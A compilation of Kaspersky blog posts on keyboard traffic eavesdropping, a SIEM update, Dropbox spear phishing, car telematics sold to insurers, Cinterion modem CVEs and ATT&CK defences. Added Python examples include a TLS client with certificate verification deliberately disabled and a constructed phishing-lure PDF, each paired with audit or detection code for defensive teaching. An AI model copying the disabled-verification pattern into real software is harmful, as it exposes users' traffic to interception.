Transatlantic Cable podcast episode 348 | Kaspersky official blog

Episode 348 of the Transatlantic Cable podcast kicks off with news that Google plan to introduce a new AI tool to help detect if you’re being scammed in a phone call – a boon for those who fall prey to scams. From there the team discuss news that Scarlett Johansson isn’t best pleased about ChatGPT’s new voice, which sounds eerily similar to her own.

To wrap up the team discuss two stories, firstly around how an ‘AI porn-maker’ (yes people, that’s now a job) accidentally leaked his own customer data. The second story centres around BT’s decision to move away from copper-cable landlines in the UK to an all-digital future – and it’s got several people annoyed.

If you liked what you heard, please consider subscribing.

Android is getting an AI-powered scam call detection feature
ChatGPT suspends Scarlett Johansson-like voice as actor speaks out against OpenAI
Nonconsensual AI Porn Maker Accidentally Leaks His Customers’ Emails
BT scraps digital landline switch deadline

Kaspersky official blog – Read More

Is it possible to spy on keystrokes from an Android on-screen keyboard? | Kaspersky official blog

“Hackers can spy on every keystroke of Honor, OPPO, Samsung, Vivo, and Xiaomi smartphones over the internet” – alarming headlines like this have been circulating in the media over the past few weeks. Their origin was a rather serious study on vulnerabilities in keyboard traffic encryption. Attackers who are able to observe network traffic, for example, through an infected home router, can indeed intercept every keystroke and uncover all your passwords and secrets. But don’t rush to trade in your Android for an iPhone just yet – this only concerns Chinese language input using the pinyin system, and only if the “cloud prediction” feature is enabled. Nevertheless, we thought it would be worth investigating the situation with other languages and keyboards from other manufacturers.

Why many pinyin keyboards are vulnerable to eavesdropping

The pinyin writing system, also known as the Chinese phonetic alphabet, helps users write Chinese words using Latin letters and diacritics. It’s the official romanization system for the Chinese language, adopted by the UN among others. Drawing Chinese characters on a smartphone is rather inconvenient, so the pinyin input method is very popular, used by over a billion people, according to some estimates. Unlike many other languages, word prediction for Chinese, especially in pinyin, is difficult to implement directly on a smartphone – it’s a computationally complex task. Therefore, almost all keyboards (or more precisely, input methods – IMEs) use “cloud prediction”, meaning they instantaneously send the pinyin characters entered by the user to a server and receive word completion suggestions in return. Sometimes the “cloud” function can be turned off, but this reduces the speed and quality of the Chinese input.

To predict the text entered in pinyin, the keyboard sends data to the server

Of course, all the characters you type are accessible to the keyboard developers due to the “cloud prediction” system. But that’s not all! Character-by-character data exchange requires special encryption, which many developers fail to implement correctly. As a result, all keystrokes and corresponding predictions can be easily decrypted by outsiders.

You can find details about each of the errors found in the original source, but overall, of the nine keyboards analyzed, only the pinyin IME in Huawei smartphones had correctly implemented TLS encryption and resisted attacks. However, IMEs from Baidu, Honor, iFlytek, OPPO, Samsung, Tencent, Vivo, and Xiaomi were found to be vulnerable to varying degrees, with Honor’s standard pinyin keyboard (Baidu 3.1) and QQ pinyin failing to receive updates even after the researchers contacted the developers. Pinyin users are advised to update their IME to the latest version, and if no updates are available, to download a different pinyin IME.
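The finding above comes down to whether a client actually validates the server it talks to. As an added example (not code from the study, from any keyboard vendor, or from Kaspersky), the following Python contrasts a TLS client context whose verification has been switched off with one built from the platform trust store, and runs the checks a reviewer would apply to either. Both contexts are constructed here for illustration; the audit uses only the standard `ssl` module attributes.

```python
import ssl

# Added illustration: a "TLS" client that validates nothing versus a hardened
# one, plus the audit a reviewer runs on a client context. Both contexts are
# constructed for this example and are not taken from any keyboard app.


def weak_client_context() -> ssl.SSLContext:
    """Uses TLS on the wire but accepts any certificate for any host.
    A network-level observer (e.g. a compromised home router) can terminate
    the connection itself and read every keystroke sent to the 'cloud'."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE     # no certificate validation at all
    return ctx


def hardened_client_context() -> ssl.SSLContext:
    """Relies on the OS trust store, checks the server name and refuses
    protocol versions older than TLS 1.2."""
    ctx = ssl.create_default_context()  # CERT_REQUIRED + check_hostname=True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_tls_context(ctx: ssl.SSLContext) -> dict:
    """Return the findings a reviewer would raise against a client context."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("server certificate is not verified")
    if not ctx.check_hostname:
        findings.append("server hostname is not checked")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("legacy TLS versions below 1.2 are accepted")
    return {"ok": not findings, "findings": findings}


if __name__ == "__main__":
    for name, ctx in (("weak", weak_client_context()),
                      ("hardened", hardened_client_context())):
        print(name, audit_tls_context(ctx))
```

The same three properties (certificate verification, hostname check, minimum protocol version) are what an app review looks for in any client that sends typed text to a server; a home-grown cipher layered on top of plaintext HTTP fails the first two by construction.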

Do other keyboards send keystrokes?

There is no direct technical need for this. For most languages, word and sentence endings can be predicted directly on the device, so popular keyboards don’t require character-by-character data transfer. Nevertheless, data about entered text may be sent to the server for personal dictionary synchronization between devices, for machine learning, or for other purposes not directly related to the primary function of the keyboard – such as advertising analytics.

Whether you want such data to be stored on Google and Microsoft servers is a matter of personal choice, but it’s unlikely that anyone would be interested in sharing it with outsiders. At least one such incident was publicized in 2016 – the SwiftKey keyboard was found to be predicting email addresses and other personal dictionary entries of other users. After the incident, Microsoft temporarily disabled the synchronization service, presumably to fix the errors. If you don’t want your personal dictionary stored on Microsoft’s servers, don’t create a SwiftKey account, and if you already have one, deactivate it and delete the data stored in the cloud by following these instructions.

There have been no other widely known cases of typed text being leaked. However, research has shown that popular keyboards actively monitor metadata as you type. For example, Google’s Gboard and Microsoft’s SwiftKey send data about every word entered: language, word length, the exact input time, and the app in which the word was entered. SwiftKey also sends statistics on how much effort was saved: how many words were typed in full, how many were automatically predicted, and how many were swiped. Considering that both keyboards send the user’s unique advertising ID to the “headquarters”, this creates ample opportunity for profiling – for example, it becomes possible to determine which users are corresponding with each other in any messenger.

If you create a SwiftKey account and don’t disable the “Help Microsoft improve” option, then according to the privacy policy, “small samples” of typed text may be sent to the server. How this works and the size of these “small samples” is unknown.

“Help Microsoft improve”… what? Collecting your data?

Google allows you to disable the “Share Usage Statistics” option in Gboard, which significantly reduces the amount of information transmitted: word lengths and apps where the keyboard was used are no longer included.

Disabling the “Share Usage Statistics” option in Gboard significantly reduces the amount of information collected

In terms of cryptography, data exchange in Gboard and SwiftKey did not raise any concerns among the researchers, as both apps rely on the standard TLS implementation in the operating system and are resistant to common cryptographic attacks. Therefore, traffic interception in these apps is unlikely.

In addition to Gboard and SwiftKey, the authors also analyzed the popular AnySoftKeyboard app. It fully lived up to its reputation as a keyboard for privacy diehards by not sending any telemetry to servers.

Is it possible for passwords and other confidential data to leak from a smartphone?

An app doesn’t have to be a keyboard to intercept sensitive data. For example, TikTok monitors all data copied to the clipboard, even though this function seems unnecessary for a social network. Malware on Android often activates accessibility features and administrator rights on smartphones to capture data from input fields and directly from files of “interesting” apps.

On the other hand, an Android keyboard can “leak” not only typed text. For example, the AI.Type keyboard caused a data leak for 31 million users. For some reason, it collected data such as phone numbers, exact geolocations, and even the contents of address books.

How to protect yourself from keyboard and input field spying

Whenever possible, use a keyboard that doesn’t send unnecessary data to the server. Before installing a new keyboard app, search the web for information about it – if there have been any scandals associated with it, it will show up immediately.
If you’re more concerned about the keyboard’s convenience than its privacy (we don’t judge, the keyboard is important), go through the settings and disable the synchronization and statistics transfer options wherever possible. These may be hidden under various names, including “Account”, “Cloud”, “Help us improve”, and even “Audio donations”.
Check which Android permissions the keyboard needs and revoke any that it doesn’t need. Access to contacts or the camera is definitely not necessary for a keyboard.
Only install apps from trusted sources, check the app’s reputation, and, again, don’t give it excessive permissions.
Use comprehensive protection for all your Android and iOS smartphones, such as Kaspersky Premium.


Updating our SIEM system to version 3.0.3 | Kaspersky official blog

For many InfoSec teams, security information and event management (SIEM) is at the heart of what they do. A company’s security depends to a large extent on how well its SIEM system allows experts to focus directly on combating threats and avoid routine tasks. That’s why almost every update of our Kaspersky Unified Monitoring and Analysis Platform is aimed at improving the user interface, automating routine processes and adding features to make the work of security teams easier. Many of the improvements are based on feedback from our customers’ InfoSec experts. In particular, the latest version of the platform (3.0.3) introduces the following features and improvements.

Writing filter conditions and correlation rules as code

Previously, analysts had to set filters and write correlation rules by clicking the conditions they needed. In this update, the redesigned interface now allows advanced users to write rules and conditions as code. Builder mode remains: filter and selector conditions are automatically translated between builder and code modes.

Same rule condition in builder and code modes

What’s more, builder mode also lets you write conditions using the keyboard. As soon as you start entering a filter condition, Kaspersky Unified Monitoring and Analysis Platform will suggest suitable options from event fields, dictionaries, active sheets, etc. To narrow down the range of options, simply enter the appropriate prefix. For your convenience, condition types are highlighted in different colors.

Code mode lets you quickly edit correlation rule conditions, as well as select and copy conditions as code and easily transfer them between different rules or different selectors within a rule. The same code blocks can also be moved to filters (a separate system resource), which greatly simplifies their creation.

Extended event schema

Kaspersky Unified Monitoring and Analysis Platform retains Common Event Format (CEF) as the basis for the event schema, but we have added the ability to create custom fields, which means you can now implement any taxonomy. No more being limited to vendor-defined fields: you can name event fields anything you want to make it easier to write search queries. Custom fields are typed and must begin with a prefix that determines both the field’s type and its array type. Fields with arrays can only be used in JSON and KV normalizers.

Example of normalization using CEF fields and custom fields

Automatic identification of event source

Kaspersky Unified Monitoring and Analysis Platform administrators no longer need to set up a separate collector for each event type or open ports for each collector on the firewall – in the new version we have implemented the ability to collect events of different formats with a single collector. The collector selects the correct normalizer based on the source IP address. Using a chain of normalizers is permitted. For example, the [OOTB] Syslog header normalizer accepts events from multiple servers and allows you to define a DeviceProcessName and direct bind events to the [OOTB] BIND Syslog normalizer and squid events to the [OOTB] Squid access Syslog normalizer.

Kaspersky Unified Monitoring and Analysis Platform: Event parsing

The following event normalization options are now available:

1 collector – 1 normalizer. We recommend using this method if you have many events of the same type or many IP addresses from which events of the same type may originate. In terms of SIEM performance, configuring a collector with only one normalizer would be optimal.

1 collector – multiple normalizers, based on IP addresses. This method is available for collectors with a UDP, TCP or HTTP connector. If a UDP, TCP or HTTP connector is specified in the collector at the Transport step, then at the Event Parsing step, on the Parsing settings tab, you can specify multiple IP addresses and select which normalizer to use for events arriving from those addresses. The following types of normalizers are available: JSON, CEF, regexp, Syslog, CSV, KV, XML. For Syslog or regexp normalizers, you can specify additional normalization conditions depending on the value of the DeviceProcessName field.
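The routing described in the two options above, as an added example in Python that is not the product’s own code or rule syntax: one collector picks a normalizer by the event’s source address, and a syslog-header normalizer then chains to a BIND or Squid normalizer by the process name in the header. Field names mimic CEF-style names; the `S.`, `N.` and `SA.` custom-field prefixes, the IP ranges and the log lines are all constructed for this illustration.

```python
import ipaddress
import json
import re

# Added illustration of "one collector, several normalizers" with a chained
# syslog-header normalizer. Custom-field prefixes (S. string, N. number,
# SA. string array) are hypothetical; sample events are constructed.

SYSLOG_HEADER = re.compile(
    r"^<(?P<pri>\d+)>(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<proc>[\w./-]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$")
BIND_QUERY = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<src>[\d.]+)#\d+ \(\S+\): query: "
    r"(?P<qname>\S+) IN (?P<qtype>\w+)")
SQUID_ACCESS = re.compile(
    r"^\d+\.\d+\s+\d+\s+(?P<src>[\d.]+)\s+(?P<status>\S+)\s+(?P<bytes>\d+)"
    r"\s+(?P<method>\w+)\s+(?P<url>\S+)")


def normalize_bind(hdr):
    m = BIND_QUERY.search(hdr["msg"])
    if not m:
        raise ValueError("not a BIND query line: %r" % hdr["msg"])
    return {"DeviceVendor": "ISC", "DeviceProduct": "BIND",
            "DeviceProcessName": hdr["proc"], "DeviceHostName": hdr["host"],
            "SourceAddress": m["src"], "DestinationHostName": m["qname"],
            "S.QueryType": m["qtype"]}            # custom string field


def normalize_squid(hdr):
    m = SQUID_ACCESS.match(hdr["msg"])
    if not m:
        raise ValueError("not a squid access line: %r" % hdr["msg"])
    return {"DeviceVendor": "Squid", "DeviceProduct": "Squid proxy",
            "DeviceProcessName": hdr["proc"], "DeviceHostName": hdr["host"],
            "SourceAddress": m["src"], "RequestMethod": m["method"],
            "RequestUrl": m["url"], "N.BytesSent": int(m["bytes"])}  # custom number


def syslog_header_normalizer(raw, routes):
    """Parse the syslog header, then hand the event to the normalizer
    registered for its DeviceProcessName (the chained normalizer)."""
    m = SYSLOG_HEADER.match(raw)
    if not m:
        raise ValueError("not a syslog line")
    hdr = m.groupdict()
    sub = routes.get(hdr["proc"])
    if sub is None:   # unknown process: keep the header fields only
        return {"DeviceProcessName": hdr["proc"],
                "DeviceHostName": hdr["host"], "Message": hdr["msg"]}
    return sub(hdr)


def json_normalizer(raw, mapping):
    """Rename JSON keys into schema fields; array-valued custom fields are
    only used here, matching the JSON/KV restriction stated in the text."""
    doc = json.loads(raw)
    return {dst: doc[src] for src, dst in mapping.items() if src in doc}


class Collector:
    """A single collector that selects the normalizer by source address."""

    def __init__(self):
        self.rules = []                      # (network, normalizer)

    def route(self, cidr, normalizer):
        self.rules.append((ipaddress.ip_network(cidr), normalizer))

    def ingest(self, src_ip, raw):
        addr = ipaddress.ip_address(src_ip)
        for net, normalizer in self.rules:
            if addr in net:
                event = normalizer(raw)
                event.setdefault("DeviceAddress", src_ip)
                return event
        raise LookupError("no normalizer configured for %s" % src_ip)


def build_collector():
    c = Collector()
    syslog_routes = {"named": normalize_bind, "squid": normalize_squid}
    c.route("10.0.1.0/24", lambda raw: syslog_header_normalizer(raw, syslog_routes))
    c.route("10.0.2.10/32", lambda raw: json_normalizer(
        raw, {"user": "SourceUserName", "action": "DeviceAction", "tags": "SA.Tags"}))
    return c


SAMPLE_EVENTS = [   # constructed
    ("10.0.1.5", "<30>May 21 10:15:01 ns1 named[1234]: client 10.0.1.77#51234 "
                 "(intranet.example): query: intranet.example IN A + (10.0.1.5)"),
    ("10.0.1.6", "<30>May 21 10:15:02 proxy1 squid[4321]: 1716286502.120 45 10.0.1.78 "
                 "TCP_MISS/200 5120 GET http://example.org/index.html - HIER_DIRECT/93.184.216.34 text/html"),
    ("10.0.2.10", '{"user": "alice", "action": "login", "tags": ["vpn", "mfa"]}'),
]


def normalize_all():
    c = build_collector()
    return [c.ingest(ip, raw) for ip, raw in SAMPLE_EVENTS]
```

The first rule in `build_collector` is the “1 collector – multiple normalizers” case: any host in 10.0.1.0/24 hits the syslog-header normalizer, which only then decides between BIND and Squid parsing, so both servers share one listening port on the collector.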

These are by no means the only updates to Kaspersky Unified Monitoring and Analysis Platform. There are also changes related to context tables, simplified binding of rules to correlators and other improvements. All of them are designed to improve the user experience for InfoSec professionals – see the full list here. To learn more about our SIEM system, Kaspersky Unified Monitoring and Analysis Platform, please visit the official product page.


Transatlantic Cable podcast episode 347 | Kaspersky official blog

Episode 347 of the Transatlantic Cable podcast begins with news that Dell have been hit by a data breach; however, details on the breach are scarce. Following that, the team discuss another data breach, this time affecting Europol.

To wrap up the team discuss two stories, the first around Spanish police pulling data on suspects from sources such as Proton mail and Apple. The final story is around Securelist’s latest APT report, looking at Q1 2024.

If you liked what you heard, please consider subscribing.

Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data
Europol Hacked? IntelBroker Claims Major Law Enforcement Breach
Encrypted services Apple, Proton and Wire helped Spanish police identify activist
APT trends report Q1 2024


Two-stage Dropbox spear phishing | Kaspersky official blog

Phishers are increasingly using sophisticated targeted attacks. In addition to leveraging a variety of legitimate online services, they employ social engineering to trick the victim into following a link. We recently uncovered another in a series of unconventional multi-stage phishing schemes that merits at least a warning to employees who handle financial documents.

The first email

The attack begins with an email to the victim that appears to be from a real auditing firm. In it, the sender says that they tried to send an audited financial statement, but it was too large to email, so it had to be uploaded to Dropbox. Note that the email is sent from a real address on the company’s mail server (the attackers most likely hijacked the mailbox).

The first email from an “auditing firm” is intended to soften up the victim

From the perspective of any mail security system, this email is perfectly legitimate – indistinguishable from normal business correspondence. It contains no links, comes from a legitimate company address, and merely informs the recipient of a failed attempt to send an audit via email. This message is bound to get the attention of the accountant reading it. It contains a disclaimer that the content is confidential and intended solely for the recipient, and the company in whose name it was sent has a large online presence. All in all, it looks pretty convincing.

The only small red flag is the information that the report had to be resent using Dropbox Application Secured Upload. There is no such thing. A file uploaded to Dropbox can be password-protected, but nothing more. The real purpose of this phrase is presumably to prepare the recipient for the fact that some form of authentication will be required to download the report.

The second email

Next comes a notification directly from Dropbox itself. It states that the auditor from the previous email has shared a file called “audited financial statements” and asked that it be reviewed, signed, and returned for processing.

A perfectly normal Dropbox notification stating that a file has been shared with the recipient

There is nothing suspicious about this email either. It contains a link to a perfectly legitimate online data storage service (which is why they use Dropbox). If the notification had arrived without any accompanying message, it would most likely have been ignored. However, the recipient has been primed, so they are more likely to go to the Dropbox website and try to view the document.

Dropbox file

When the victim clicks the link, they see a blurred document and a window opens on top of it requesting authentication using office credentials. Here, however, seeing is not believing, for both the blurred background and the window with a button are in fact parts of a single image inserted into a PDF file.

PDF file uploaded to Dropbox that mimics an authentication request

The victim doesn’t even need to click the VIEW DOCUMENT button – the entire surface of the image is essentially one big button. The link underneath it leads (via an intermediate site with a redirect) to a script that launches a form to enter login credentials – just what the attackers want.
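The lure relies on a PDF whose only content is an image with a link annotation stretched over the whole page. As an added example (not Kaspersky’s code and not a full PDF parser), the following Python applies that heuristic to raw PDF bytes: it looks for image XObjects, measures how much of the page each link annotation covers, and extracts the target URIs. The two PDFs are constructed inline to mimic the lure and a normal report; real-world files with compressed object streams would need a proper PDF library before these checks.

```python
import re

# Added heuristic for the "one big clickable image" lure described above.
# Both PDFs below are constructed for this example; the URIs are placeholders.

LURE_PDF = b"""%PDF-1.4
3 0 obj << /Type /Page /MediaBox [0 0 612 792] /Resources << /XObject << /Im0 4 0 R >> >> /Contents 5 0 R /Annots [6 0 R] >> endobj
4 0 obj << /Type /XObject /Subtype /Image /Width 612 /Height 792 /ColorSpace /DeviceRGB /BitsPerComponent 8 /Length 3 >> stream
abc
endstream endobj
5 0 obj << /Length 32 >> stream
q 612 0 0 792 0 0 cm /Im0 Do Q
endstream endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (https://redirect.example.invalid/step1) >> >> endobj
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.4
3 0 obj << /Type /Page /MediaBox [0 0 612 792] /Contents 5 0 R /Annots [6 0 R] >> endobj
5 0 obj << /Length 48 >> stream
BT /F1 12 Tf 72 720 Td (Quarterly report) Tj ET
endstream endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 200 712] /A << /S /URI /URI (https://intranet.example.invalid/report) >> >> endobj
%%EOF
"""

NUM = rb"([\d.]+)"
MEDIABOX_RE = re.compile(rb"/MediaBox\s*\[\s*" + rb"\s+".join([NUM] * 4) + rb"\s*\]")
LINK_RE = re.compile(rb"/Subtype\s*/Link[^\n]*?/Rect\s*\[\s*" + rb"\s+".join([NUM] * 4) + rb"\s*\]")
URI_RE = re.compile(rb"/S\s*/URI\s*/URI\s*\(([^)]*)\)")
IMAGE_RE = re.compile(rb"/Subtype\s*/Image")


def _area(box):
    x0, y0, x1, y1 = box
    return max(0.0, x1 - x0) * max(0.0, y1 - y0)


def analyze_pdf(data: bytes) -> dict:
    """Summarise link/image indicators; 'image_lure' is true when an image
    is present and some link annotation covers at least 90% of the page."""
    mb = MEDIABOX_RE.search(data)
    page = tuple(float(v) for v in mb.groups()) if mb else (0.0, 0.0, 612.0, 792.0)
    links = [tuple(float(v) for v in m.groups()) for m in LINK_RE.finditer(data)]
    uris = [u.decode("latin-1") for u in URI_RE.findall(data)]
    images = len(IMAGE_RE.findall(data))
    coverage = max((_area(r) / _area(page) for r in links), default=0.0)
    return {
        "images": images,
        "links": len(links),
        "uris": uris,
        "max_link_coverage": round(coverage, 3),
        "image_lure": images >= 1 and coverage >= 0.9 and bool(uris),
    }


if __name__ == "__main__":
    print("lure:  ", analyze_pdf(LURE_PDF))
    print("benign:", analyze_pdf(BENIGN_PDF))
```

A mail or file-sharing gateway can use the `image_lure` flag together with the extracted URIs (which point at an intermediate redirector rather than the organisation’s own domain) to quarantine the document for review before an accountant ever sees the fake sign-in prompt.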

All company employees need to be aware that work passwords should only be entered on sites that clearly belong to their company. Neither Dropbox nor external auditors should know your work password and therefore cannot verify its authenticity.

How to stay safe

As attackers come up with ever more sophisticated schemes to steal corporate credentials, we recommend implementing solutions that provide information security on multiple levels. First, use corporate mail server protection, and second, install a security solution with reliable anti-phishing technologies on all internet-facing work devices.


How carmakers sell driver data to insurers | Kaspersky official blog

Early in the movie “The Fifth Element”, there is a sequence that shows the dystopian nature of the future world: Korben Dallas’s smart taxi fines him for a traffic violation and revokes his license. Back in 1997, this seemed like science fiction – and it was. Today it’s turning into reality. But first things first.

Not so long ago, we looked at the potential dangers associated with the amount of data modern vehicles collect about their owners. Then, even more recently, an investigation revealed what this might mean in practice for drivers.

It turns out that carmakers, through specialized data brokers, are already selling telematics data to insurance companies, who are using it to raise the cost of insurance for careless drivers. Most alarming of all, however, is that car owners are often kept in the dark about all of this. Let’s investigate further.

Gamification of safe driving with far-reaching consequences

It all started in the US when owners of General Motors vehicles (parent company of the Chevrolet, Cadillac, GMC, and Buick brands) noticed a sharp rise in their auto insurance premiums compared to the previous period. The reason, it transpired, was the practice of risk profiling by data broker LexisNexis. LexisNexis works with auto insurers to supply them with driver information, usually about accidents and traffic fines. But vehicle owners hit by the premium hike had no history of accidents or dangerous driving!

The profiles compiled by LexisNexis were found to contain detailed data on all trips made in the insured vehicle, including start and end times, duration, distance and, crucially, all instances of hard acceleration and braking. And it was this data that insurers were using to increase insurance premiums for less-than-perfect drivers. Where did the data broker get such detailed information?

From General Motors’ OnStar Smart Driver. That is the name of the “safe driving gamification” feature built into General Motors vehicles and the myChevrolet, myCadillac, myGMC, and myBuick mobile apps. The feature tracks hard acceleration and braking, speeding, and other dangerous events, and rewards “good” driving with virtual awards.

The OnStar Smart Driver safe driving gamification feature is built into myChevrolet, myCadillac, myGMC, and myBuick mobile apps by General Motors. Source

What’s more, according to some car owners, they didn’t enable the feature themselves – the car dealer did it for them. Crucially, neither General Motors’ apps nor the terms of use explicitly warned users that OnStar Smart Driver data would be shared with insurance-related data brokers.

This lack of transparency extended to the privacy statement on the OnStar website. While the statement mentions the possibility of sharing collected data with third parties, insurers are not specifically listed, and the text generally aims for maximum vagueness.

Along the way, LexisNexis was discovered to be working with three other automakers besides General Motors – Kia, Mitsubishi, and Subaru – all of which have similar safe driving gamification programs under names like “Driving Score” or “Driver Feedback”.

According to the LexisNexis website, the companies that work with the data broker include General Motors, Kia, Mitsubishi, and Subaru. Source

At the same time, another data broker – Verisk – was found to be providing telematics data to car insurers. Its automotive clients include General Motors, Honda, Hyundai, and Ford.

Another broker, Verisk, lists General Motors, Honda, Hyundai, and Ford in its telematics sales service description. Source

As a result, many drivers found themselves, in effect, locked into a car insurance policy with costs based on driving habits. It’s just that such programs used to be voluntary, offering a basic discount for participation – and even then, most drivers opted out. Now it appears that carmakers are enrolling customers not only without their consent, but without their knowledge.

According to available information, this is currently only happening to drivers in the US. But what starts in the States usually migrates, so similar practices may soon appear in other regions.

How to protect yourself from data-hungry cars

Unfortunately, there is no silver bullet to stop your automobile from harvesting data. Most new vehicles already come with built-in telematics collection as standard. And the number is only going to grow so that in a year or two these cars will make up more than 90% of the market. Naturally, the maker of your car won’t make it easy or even possible to turn off telematics.

If you’re ready to consider the factor of your car collecting data on you for third parties (or, in simple words, spying), then read our post with detailed tips on how you can try to get rid of surveillance by carmakers. Spoiler alert: it’s not easy and requires careful study of the documentation, as well as sacrificing some of the benefits of connected cars, so these tips won’t work for everyone.

As for the scenario described in this post of selling driver data to insurers, our advice is to search the in-vehicle menu and mobile app for a safe driving gamification feature and disable it. It may be called “Smart Driver”, “Driving Score”, “Driver Feedback”, or something similar. US-based drivers are also advised to request their data from LexisNexis and Verisk to be prepared for nasty surprises, and to see if it’s possible to delete information that has already been collected.


Critical vulnerabilities in Telit Cinterion modems | Kaspersky official blog

Several serious vulnerabilities have been discovered in Telit Cinterion cellular M2M modems, including the possibility of remote arbitrary code execution (RCE) via SMS messages. These modems are used in millions of different devices and systems for both the consumer market segment (payment terminals, ATMs, cars) and various industries such as healthcare, financial, telecommunications, manufacturing and so on. We’ll tell you about the detected vulnerabilities and how you can protect yourself from them.

Critical vulnerabilities in Cinterion modems

In total, Kaspersky ICS-CERT experts discovered seven zero-day vulnerabilities in Telit Cinterion modems:

CVE-2023-47610 / KLCERT-23-018: An attacker can achieve remote code execution (RCE) on the system by sending specially crafted SMS.
CVE-2023-47611 / KLCERT-22-216: Allows an attacker with low privileges on the system to elevate them to “manufacturer” level.
CVE-2023-47612 / KLCERT-22-194: An attacker with physical access to the device has the ability to read and write any files and directories on the system, including those that are hidden.
CVE-2023-47613 / KLCERT-22-211: Allows an attacker with low privileges on the system to escape a virtual directory and gain read and write access to protected files.
CVE-2023-47614 / KLCERT-22-210: Allows an attacker with low privileges on the system to disclose hidden virtual paths and filenames.
CVE-2023-47615 / KLCERT-22-212: Allows an attacker with low privileges on the system to gain unauthorized access to sensitive data.
CVE-2023-47616 / KLCERT-22-193: An attacker with physical access to the device has the ability to gain unauthorized access to sensitive data.

The most dangerous is the first vulnerability on this list (CVE-2023-47610). Among other things, it allows attackers to manipulate the modem’s memory and flash drive, ultimately giving them complete control over the system. Furthermore, this attack does not require physical access to the device or authentication.

Which devices have the described vulnerabilities?

All of the vulnerabilities mentioned above, from CVE-2023-47610 to CVE-2023-47616, affect the following list of cellular IoT modems:

Cinterion BGS5
Cinterion EHS5/6/8
Cinterion PDS5/6/8
Cinterion ELS61/81
Cinterion PLS62

Information about the vulnerabilities in these products was communicated in advance to Cinterion, the manufacturer of the modems.

It should be noted that the Cinterion modem line has changed hands several times. The Cinterion company was acquired by Gemalto in 2010. In 2019, Gemalto was absorbed by Thales. Finally, in 2023, Thales sold the Cinterion modem line to Telit, resulting in Telit Cinterion.

It’s extremely difficult at this stage to compile a complete list of end products affected by these vulnerabilities. Manufacturers rarely disclose the component base used in their products, and cellular modem chips are often not directly integrated into end devices, but are parts of other components. What you end up with is multistage nesting – one supplier uses another supplier’s solutions in their product, that supplier uses a third, and so on down the chain. As a result, it is not easy even for the manufacturer of the end device to determine which chip performs the modem functions.

In the near future, our experts plan to publish a detailed technical report on the security of Telit Cinterion modems on the Kaspersky ICS-CERT website.

We are now communicating with the manufacturers of those products known to use vulnerable modems.

If you are aware of such products, please notify us at ics-cert@kaspersky.com. We will try to contact the manufacturers and provide them with a modem vulnerability report so that they can assess the impact of the vulnerabilities on the security of their products and plan mitigation measures.

How to protect yourself from the described vulnerabilities

To protect against the most dangerous of the discovered vulnerabilities (CVE-2023-47610), Kaspersky ICS-CERT experts recommend the following measures:

Disable SMS delivery to affected devices (this can be done by the telecom operator).
Use a private access point name (APN) with strict security settings.

For the other vulnerabilities (from CVE-2023-47611 to CVE-2023-47616), Kaspersky ICS-CERT experts advise doing the following:

Enforce application signature verification to prohibit installation of untrusted MIDlets on the device.
Strictly control physical access to the vulnerable devices.
Install updates and perform regular security audits.


Defending against popular cyberattack techniques in 2024

Recent reports by Kaspersky experts on the statistics of Managed Detection and Response (MDR) and Incident Response (IR) services for 2023 reveal that most observed cyberattacks employ a handful of techniques that are repeated time and again. These techniques are seen both in attacks that are fully executed and cause damage, as well as in incidents that are stopped in their early stages. We decided to list these techniques based on the ATT&CK framework and summarize expert recommendations for neutralizing them. The frequency of use for each technique and specific examples can be found in the reports themselves.

Exploiting public-facing applications

ATT&CK Technique: T1190, Tactic: TA0001 (Initial Access)

What it is: Exploiting vulnerabilities in one of the organization’s applications that is accessible from the internet. Web servers, Exchange servers, database servers, and VPN access points are the most popular targets. Attackers also actively seek out and exploit publicly accessible IT infrastructure control panels – from SSH servers to SNMP.

How to protect yourself: Prioritize updating software at the network perimeter and use additional security measures for perimeter services. Close control ports to external access. Regularly scan the external perimeter for vulnerabilities and for applications that have accidentally been granted external access, and revoke it. Install EDR agents and security tools, including on application servers.

Phishing

ATT&CK Technique: T1566, Tactic: TA0001 (Initial Access)

What it is: Mass or targeted distribution of messages via email, SMS, and messaging apps designed to trick company employees into disclosing their credentials or downloading malicious content via a link.

How to protect yourself: Raise awareness among all company employees, conduct training sessions, use the latest security solutions for mail servers, and deploy EMM/UEM solutions to protect employees’ mobile devices, including personal ones.

Valid accounts compromised by attackers

ATT&CK Technique: T1078, Tactics: TA0001, TA0003, TA0004, TA0005 (Initial Access, Persistence, Privilege Escalation, Defense Evasion)

What it is: One of the most effective techniques employed by attackers. During initial network penetration, attackers use employee credentials obtained through purchased leaks or phishing. They then use domain and local accounts found on the compromised computer to develop the attack.

How to protect yourself: Implement phishing-resistant multi-factor authentication (MFA) methods, especially for privileged accounts. Adopt the principle of least privilege. Deactivate default accounts (such as “guest”), and for local administrator accounts, set a unique password for each computer. Use SIEM and XDR to detect anomalous user actions.

Brute force

ATT&CK Technique: T1110, Tactic: TA0006 (Credential Access)

What it is: Attackers can discover passwords for accounts of interest through brute-force attacks or password guessing based on known hashes. A variation of this attack is password spraying, where the same popular passwords are applied to a number of accounts in the hope of finding a user who chose such a weak password.

How to protect yourself: Implement password policies that prevent brute-force attacks and apply stricter policies to accounts where MFA cannot be enabled. Limit the number of login attempts across all systems and block the account if the number of attempts is exceeded. Configure SIEM monitoring rules to detect an overall increase in failed authentication attempts.

Trusted relationship

ATT&CK Technique: T1199, Tactic: TA0001 (Initial Access)

What it is: Compromising an organization through its partners and contractors. If a partner is hacked, attackers can use the discovered access points and tools to infiltrate the organization. In practice, hackers most often target IT subcontractors (MSPs, authentication providers, technical support specialists) with administrative access to the organization’s systems.

How to protect yourself: Regularly audit external access, revoke outdated permissions, apply the principle of least privilege to those accounts, and enforce strict password policies and MFA for them. Use network segmentation to restrict external contractors to only the resources they need.

